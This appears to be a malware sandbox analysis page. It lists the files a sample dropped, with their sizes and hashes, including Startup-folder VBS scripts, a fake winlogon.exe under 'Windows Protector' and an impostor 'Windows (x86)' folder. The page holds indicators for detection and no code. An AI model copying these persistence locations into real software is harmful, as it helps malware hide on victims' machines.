a68fdd5f9c4196f051972dab583ad3ea0ec9fb9627106fe2e86d9492457a08cba7771b1dc183c9f668715c7001b393d6a402f7f32e314cb5b83e366dc671f01b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9E610D72817F59FAB1BFA75BAAB7746D

Filesize
184B

MD5
6755c0d27f809b1b1d2804885c856521

SHA1
6fd8e2ec9964422fd217065deca749bbfcfb8f22

SHA256
85326bb0646bd7e85bb58cd5be1be51d6036d6e2f3678bb206ddfbdfbf402f48

SHA512
0a12516711b4852fa147094b9fa71d0fdd53e4474593e5d24a627910c67621683f02f4286df802e709b63269a17e7f7c23d487c138bd2cb69b0006d01bb0d414

Download Submit
C:\Users\Admin\AppData\Local\Temp\1102.tmp\1103.bat

Filesize
13KB

MD5
6d37a766ec204ef499738c03beb212fb

SHA1
295fdd98a838a5be50c9d3ff6052b27d25d3a231

SHA256
7043b19cd4b5d5087ff95dc07f816099bad634c28f34e3e904c1d4efca222ab9

SHA512
606c799fc9535767b241a9ab81fd9194f566f454d66110454fc9f10a2e511dc1bd2cf86121e6a7a0ada09bdac2c4110c3d9621ae7cb5c35f30ab0bda63781c5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\47CB.tmp\47CC.bat

Filesize
13KB

MD5
b8d37d42c7b70fb63c19f741c3a23d63

SHA1
62c43ac9efa8f3abb6a3a1f529076ef5d3ae37d9

SHA256
6822b2a4a79cf09c86263d7464abc7ccf375dd37ba5ff5503f3c4f1c9fad8188

SHA512
800bc7db00e77a6f563a9f036c45b3a91eb07831080903da043c00cd5d76cd0528a79458365f4077020830515a3b23689e751e9bed940738c3221a93f491d19e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IE.exe

Filesize
772KB

MD5
7ed5b2dec02ef2ddc967fa9ca0dd8d2f

SHA1
0f471be520c5c78a0a40a4026237e04c366a3110

SHA256
c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

SHA512
9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IE.exe

Filesize
772KB

MD5
7ed5b2dec02ef2ddc967fa9ca0dd8d2f

SHA1
0f471be520c5c78a0a40a4026237e04c366a3110

SHA256
c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

SHA512
9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

Download Submit
C:\Users\Admin\AppData\Local\Temp\VERIU.BAT

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\Local\Temp\VERIU.BAT

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe

Filesize
63KB

MD5
a5b1e5ca923df2568e09456390ff0ad8

SHA1
03b39ecd7d246a521fafd210d6be548fd1d337fd

SHA256
2246f52abfa3e125b7eb5831b40130fb1d4b6b2a274fef9b3b7aa854487b70a3

SHA512
7c286de35fd8899a2a43791e8a50436362a12f78b2582dcb72c75470a7ea50e3788d8ce4846de825501e929cf9a2e4ece4cd5d75f2627cd6ccf78cd91c2a885c

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat

Filesize
6KB

MD5
403d5dccab92622dd3d2bc70a95b2453

SHA1
e4cd9c7bf4493ba1f9184f3c3f46882931b891d9

SHA256
69728a0d54a5d95fb4693efac6f3873d22a2faa98a5b86cabc3a9e38675180f6

SHA512
9baf08ac4e0f104bbb8d1dddbf6dcddc728f044af8597ac4a2c6038c70ccf4ea79376a736737a5117b0aa85a01c04904da0e31843ca3d0e7eeb01c345cfe24e6

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Windows (x86)\1xs.txt

Filesize
1KB

MD5
4bef77593548c8ffbe1032d1e19fdbe1

SHA1
396ed9957651cd175dfe1a07274fcf97b8498c7b

SHA256
19c089eef95773db053e4296baa918ed3a4e98fed7ec96ea5dd796bf95b5f4c6

SHA512
661769875578c3e498b526f0541b6ab4f52d87b49e0b0688ac65b3c44f2bdf929bf810c0187c8cc39ab9a004d3e985dc0120f12c07e8cd646beedba93ea93546

Download Submit
C:\Windows (x86)\3xs.txt

Filesize
938B

MD5
d80386f87dd89d45b52e57309bb3d967

SHA1
4b5df6a75c30a66d153b021518383d9e78d85c96

SHA256
0cb8999b0ac329d2f18a50a25344c8075f7e2eb472292f04bc099afef90166aa

SHA512
7fe22bc10555f6db611248418d04d47805970f04bddc05f6e40ab98a02b6f238292cf746ca1b48f575d5c511e5adaece68110d167bccc91aadda41772fe80096

Download Submit
C:\Windows (x86)\AppxProvisioning.xml

Filesize
2KB

MD5
85acfc76e1be21cd8602f85d1cf845ba

SHA1
f5507f6cf6e9b03ca06a69fffafede91d2799ef0

SHA256
29b4fc2e6b4814d13cea16ed9114e6cb764a1e92dbc1ed49ef834168b1e9cfb4

SHA512
e6c8b19d798c04ebfac501ed55bd5218f59e3780501ec200196f81d6f3d8069d1a43f3629932683c531dd3977b44e1a5e3f7c8e793b92c0797d4810150b4d068

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-black.png

Filesize
8KB

MD5
705628497c0012302212a46add463e6e

SHA1
c1b0e1ed262832698d695d6893408f271a3832f1

SHA256
a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

SHA512
0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-high.png

Filesize
8KB

MD5
f63c615733a3337bf2bea96c6ee9b568

SHA1
9c6122515da1d630ca04a303c4c296be6a696e14

SHA256
b0fda245579e57a9c613e1288c6b294c907a3b8e5bee32a72437a4fbfabc061c

SHA512
76c024e3a2bee36d308db5a71e5cd30410b25cdb55412d9ffe68f6c2ed83a6553ee9dca53e8996631b42b48b3ffd12470658e9645ec6a2270711cbb15561f897

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-white.png

Filesize
8KB

MD5
705628497c0012302212a46add463e6e

SHA1
c1b0e1ed262832698d695d6893408f271a3832f1

SHA256
a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

SHA512
0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.png

Filesize
8KB

MD5
daf1dcb4aee839a1965f4cc160c49a53

SHA1
5830048cd318d13c2841998082c97fb579040904

SHA256
91d33ec5f008f2066b3a6658e1915b09a4fea2ed70e5260a0bd37c618c219fc1

SHA512
9b2af035dcf877eaca4ea5da053417fd8840d79abcff53e607bbd48f21cda85ae004f94325da44266653d23a255e85675100a41521b840c7bf282dde48bbd23e

Download Submit
C:\Windows (x86)\DMAppsRes.dll

Filesize
2KB

MD5
373e36f2470ad6dd714bee7ce7406c03

SHA1
6f99d517470ad94c709b43d11a7182b4e28b0c47

SHA256
04ba799641106d47e995283c3b1d1196b1837025fafadafe4b983ecb98a089af

SHA512
82b0802423a1486c6dd77714ae468fe8327de39c6402c1927dddfca632ab7d27e2f65714fa25780cd51b528deaa38bf956b778a1b9e0e3adeab622a29c0ec725

Download Submit
C:\Windows (x86)\DetailedReading-Default.xml

Filesize
3KB

MD5
4a6fa3c0efd237f104e09a22883d9388

SHA1
4fb30a39a11ef1115159b8585efeab4fc9ddaa91

SHA256
a75bcfa83c8e80720624646486daec8c1835fef2fef868b93e02a4c489287c7c

SHA512
489a0b94a34aa7068741a77c7f78319d582ed7ad15b077727b3c1af501056d67f12ba47007f78f07868690b83d10815ed5c83f641dc8c87ad99cb2fa1794df6d

Download Submit
C:\Windows (x86)\FXSEVENT.dll

Filesize
8KB

MD5
306720d1bca22b93968b34459f047490

SHA1
0d84c6dfee0c079f809f8ff82f56ac3a0ca275e9

SHA256
2c010212274dce9fcfad0d17962577d5639cfdff3f4b875e3ed510de665cd171

SHA512
dd69c3ca2e7e271f9fdd57bffb1893c679768669e44f26a69f2ea7640738c7b97eec6d8c7749f180ce59d3d248a6c4c921b6168b536aa5b89701ebc73c1a010d

Download Submit
C:\Windows (x86)\Firewall.cpl

Filesize
7KB

MD5
afd33f68fb822fb66861903ded9fb1c5

SHA1
1dd41a8f4ced7a6e49c79005ce634280adb5d207

SHA256
a6a1c633c9bd4864349fe2b5939dcda0ad6e0d74679edfe6c0b19449c4efa3e7

SHA512
c82f1a3f84fa689ff68c4db3eb431f711d054d74179483e7802cc119b86b95b8ddc3dd3ff374a513cb6017725eaa1d4adecbc1edb84989c9e4e8f581c4ef6012

Download Submit
C:\Windows (x86)\aarun.vbs

Filesize
115B

MD5
29a3502c721319b896b4cf7aae0aaec5

SHA1
de94cfb0214c0deddfbea191598bac33dce53bb9

SHA256
a84a10c5ca727e766a5c25cf6f6f42b3dc3fd8760a5c8a755b77e1404c84b7a0

SHA512
7e791091dac79af2feb151e077ed5e991faec214ff6f857afbf882e2664fc26f044e49b218b422459e7319b1d899ad397be5b8ab9f0d036765a48cf461560cc8

Download Submit
C:\Windows (x86)\advapi32res.dll

Filesize
2KB

MD5
1ba129902c8b7bed03c7cdc7867c736f

SHA1
f2e5105d7a458aabeeb89df8c3bec343473bde99

SHA256
0e038b89882758458f234481adae1a67fb18c3255d963b1d9c969d0d395b44cb

SHA512
d712189b1a2a54117ef062215a4db0edd306cf049f62666837fd527442060141c9d729bb5f616f1f43f5807bcdb6e5d4e946a4ad4a73c3d9dbb767013f12bd3d

Download Submit
C:\Windows (x86)\asferror.dll

Filesize
2KB

MD5
7adeccbc25fc6c44822d1a3ca03d3bd9

SHA1
97d42ff16c83a0802fdfe35d4c2342ba31c532c7

SHA256
03475a7d63f2f2a09d74b6406890d40eb64432dcdc032d55b34f15abb5ca47d3

SHA512
e1442c1fe9f3ceaedaca3f889ac20aa83e40147c3cb62314871f9e90de484949531fd53920093ab7451d28a01ce5d45c612b5a5b075ef7592803da798073f6d9

Download Submit
C:\Windows (x86)\blbres.dll

Filesize
2KB

MD5
e51330dff5b6d09076abcae74bdab37b

SHA1
9827b8ec15c7aa06341763a388ab11479412fc36

SHA256
d386c4ad3223859578018d8012775021e315d2708f3d220106171d6836e6f4ad

SHA512
3eb9813c45f4fa0bda9a1bdf07456e9624679b101a0fcb47d5d37c23ffaf5f93afee2fa513f40c4aaedb7962811520e1b6fc0b994117378cb39d33480d909e68

Download Submit
C:\Windows (x86)\bootstr.dll

Filesize
3KB

MD5
5c92bc8ae13ec449ca223e229bc86fdc

SHA1
2dbe40b89946f369634666fd105f94d2eea90d2c

SHA256
69c7f82badbd72ac5460bbc8f3f33aefb705e45591fc51a47a8264b616c8dd0b

SHA512
200a715824f77c642d7318c87ed9a5d80ccf802cf02556ab4e6c908e24b31de966e7d3ab57ab0a8c8a2043007252cee3a3a9851a3964da6b994ffcfc7008a788

Download Submit
C:\Windows (x86)\bridgeres.dll

Filesize
2KB

MD5
557ec7fe5ddb6b0e2b88ec4706cb394a

SHA1
4288db3c285c6abe08011c9ec5c432795753e43b

SHA256
12f1cbbae3f347c9ac1fd9229eab1658f86f5fd3f3e8438c46b69cd0c68feee1

SHA512
ea7936e56f6de188d8b35ed4cfedbae34d4e6cb5161eadb5234bbb4bae6c3bc946b111f9cef595c3e73e1f18b1e89c5a598407426766f3d3c30c9b3106be398e

Download Submit
C:\Windows (x86)\defragres.dll

Filesize
4KB

MD5
a8e3e8608e47101445aee826fee3f611

SHA1
197258ae69a536dc0f015779bde233a3e4d49859

SHA256
8c5af3b03fcc11bf17ded481bddbdfc0811077c7391b0d4ba616cc2ead47e80c

SHA512
fbcfce2b040762de747da96460d6c648616054a8a004cb385cbf179981321339b254fa282fab171925f63ab4f9ef86724c595635db13b22521bfcbef8f9cc555

Download Submit
C:\Windows (x86)\dmdskres2.dll

Filesize
2KB

MD5
00adb63b901732cb6ebcdb3b9d404945

SHA1
946088b565459987b96427e590fceb078a3a9688

SHA256
e8a7eee20b9de1d981334011ac5550c44fb98a189a4ea24a6660c3efb314b51d

SHA512
ada58be64f7cab2fcca27e753ca9b5f4fd2eec3e6ab705bc66ad33d009819a0e5fd5bda7ccb34151cf23a023c0dd89ce4b3bfb0696ab8135c9fd9002274717a2

Download Submit
C:\Windows (x86)\dxmasf.dll

Filesize
7KB

MD5
db18dedb3b5080ff23cfb17365f8f27a

SHA1
ac2d2cf466cb8314f903599d385cdaa28f6ee2b1

SHA256
7a9ad21e76d3bd95d851752af9bc7e6e46a479994a12d51e8e62040fc06f61dd

SHA512
50e808b04a7d24b4326056cd6088ec1e2485057c2ee2102cf01093a1c8ed20929746d6c6ea19acc7ddb70b8243f46a46cef31dd1e49146db88d869227f4251d5

Download Submit
C:\Windows (x86)\edgehtmlpluginpolicy.bin

Filesize
2KB

MD5
08c33e4ab904ec0960b0781ed26ae039

SHA1
120537ad8aa71fa3f818d940557f0a9ee1049938

SHA256
b2803c9cca7abb72c72269b3ad0608f717574632bfea0cdb7145cdc93b7b3769

SHA512
137d22033fba7f72ef3c8c23771328ff4a3f67ece5f969e22c5f057f794c8d6af00e826f7b06ac10e15fc3600f151da2268f1342123b2f6a1701aedd10b477d3

Download Submit
C:\Windows (x86)\explorer.exe

Filesize
5.1MB

MD5
aa29dd540139be90fe02be76c6893534

SHA1
333faca54fc888198373cf5572df0ff092e38c9f

SHA256
3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

SHA512
a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

Download Submit
C:\Windows (x86)\f3ahvoas.dll

Filesize
8KB

MD5
bc244c0c43d633372aaa77aeff84c352

SHA1
c547d5d6b1614efde458c67dbb0ccbd5f4877900

SHA256
f3db39d0328a3c6c3226a352125a2f0f778982253afb1a171dcbce9924a30627

SHA512
0fcd0b0dffb369cd33c174dcc10959cf7a157e3c293911f7a705eb1117ae7ec31f79cfb4230c475a894f419f1f0f6c108e932ecf68746778c63d7f597b52952b

Download Submit
C:\Windows (x86)\icmp.dll

Filesize
3KB

MD5
225f69152008527eaf2b8f44a48fb95e

SHA1
ccb1d8b424a8061804b6421b94e3892f8cb7cd89

SHA256
f0d008682013a54a20d169ba702b72f4c5d0d7c12de09ccdecf514b2928182f6

SHA512
b8e10fa6f8e19f440f97454133c723265b492926c309f422eb720ba9c990790bad4e7e63fb27658bf2240de341ca71c5053f703eea286d9a08382e3c1620a3e8

Download Submit
C:\Windows (x86)\ieuinit.inf

Filesize
3KB

MD5
c1127463655f541956ff02a325996ecf

SHA1
a43961de9c70bac7c807d679376083904f8c4d7d

SHA256
9437a11c86057ec560402db712cbafeebcfc5df8fe389105c65751ecf0d02abc

SHA512
c0874025afbc94844f8354d2ab1e8c686eaca68df2c2e0690fe210e0f0df4e658c26121149111a60f747707c7f4e34d0e8f6a662b632c0bdc6e04d7ddfe60630

Download Submit
C:\Windows (x86)\iglhxs64.vp

Filesize
4KB

MD5
8589ccd79af444175f0e91ac27c6343e

SHA1
2fe8411d582d22b0132b6cf10dec81547c7e4ff6

SHA256
2498331bf9ffe87bcbefb811512192866ac5db4d9f7f1826b071e10739964a9c

SHA512
1e70cb606d4d8e71c330988bc21b80ddd795bac697546c74458fdeb8bca53d690f680929395b9db82b4922b312d93f56edf0fa7dda6173fe144fea5d1e022734

Download Submit
C:\Windows (x86)\xagal.bat

Filesize
759B

MD5
104470f3c1211668407c2519f44862f9

SHA1
58054e1f3ef8e70210fe362dd491a65231494fcb

SHA256
cd2c3436284a9e2e6505a01d73edad527e3094a7c7efc7890d476638924ed2bf

SHA512
aa1575f35d252f0a0c19599d87cd44483c3468873cd9f141e22214f22d9b321d227d9a3b027b923ea2a931896f5f7811eabf8f7ff2e7a9d869010049888848d7

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
memory/576-124-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/576-215-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/932-58-0x00000000FFFE1000-0x00000000FFFE3000-memory.dmp

Filesize
8KB

Download
